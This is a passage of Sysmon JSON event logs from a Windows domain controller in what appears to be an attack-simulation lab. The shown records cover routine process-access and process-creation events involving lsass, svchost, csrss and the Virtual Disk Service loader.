C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.020","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.020\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.020","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.027\r\nProcessGuid: {41C8662E-1F74-5F25-0000-00102CEF0200}\r\nProcessId: 3408\r\nImage: C:\\Windows\\System32\\vdsldr.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Virtual Disk Service Loader\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: vdsldr.exe\r\nCommandLine: C:\\Windows\\System32\\vdsldr.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.027","ProcessGuid":"{41C8662E-1F74-5F25-0000-00102CEF0200}","Image":"C:\\Windows\\System32\\vdsldr.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Virtual Disk Service Loader","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"vdsldr.exe","CommandLine":"C:\\Windows\\System32\\vdsldr.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.027\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00102CEF0200}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.027","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00102CEF0200}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.027\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00102CEF0200}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.027","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00102CEF0200}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.036\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.036","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.036\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.036","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.038\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-00102CEF0200}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.038","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-00102CEF0200}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.038\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 